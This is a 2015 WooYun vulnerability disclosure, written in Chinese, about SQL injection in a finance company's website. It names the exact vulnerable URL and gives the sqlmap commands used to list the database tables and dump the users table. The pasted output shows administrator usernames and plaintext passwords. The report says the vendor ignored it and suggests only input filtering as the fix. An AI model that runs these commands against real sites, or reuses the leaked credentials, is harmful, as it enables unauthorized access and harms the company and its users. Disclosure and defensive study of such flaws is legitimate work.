当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145259

漏洞标题:安盛金融存在SQL注入漏洞直接暴库登录后台

相关厂商:安盛金融

漏洞作者: Eli0t

提交时间:2015-10-08 12:21

修复时间:2015-11-22 12:22

公开时间:2015-11-22 12:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

安盛金融存在SQL注入漏洞,直接暴库,登录后台

详细说明:

SQL注入点:
http://www.anshengcredit.com/about.php?id=35
Sqlmap -u http://www.anshengcredit.com/about.php?id=35 --tables
--dbms "MySQL" -D "asweb"
Database: asweb
[18 tables]
+-------------------+
| `leave-word` |
| `news-type` |
| `site-set` |
| apply |
| area |
| auth_code |
| banner |
| city |
| column |
| menu |
| news |
| news_img |
| product |
| provincial |
| resume |
| users |
| weixin_activities |
| wx_event_record |
+-------------------+
[root@Hacker~]# Sqlmap -u http://www.anshengcredit.com/about.php?id=35 --dump --
dbms "MySQL" -D "asweb" -T "users"
Database: asweb
Table: users
[3 entries]
+--------+-----------------------------+----------+----------+------------
------------------+
| UserID | Menus | UserName | RealName | Password
stLoginTime |
+--------+-----------------------------+----------+----------+------------
------------------+
[01:32:36] [WARNING] cannot properly display Unicode characters inside Win
S command prompt (http://bugs.python.org/issue1602). All unhandled occuran
ll result in replacement with '?' character. Please, find proper character
sentation inside corresponding output files.
| ?? | as4001581118 | 2014-07-18 00:00:00 |
| 4 | 4 | anan | anan | as888888
14-11-14 11:34:11 |
| 5 | 1,2,3,8,4,10,5,9,6 | lob | lobyan | qq632330

漏洞证明:

QQ截图20151008014426.png

修复方案:

过滤~
排查其他~

版权声明:转载请注明来源 Eli0t@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝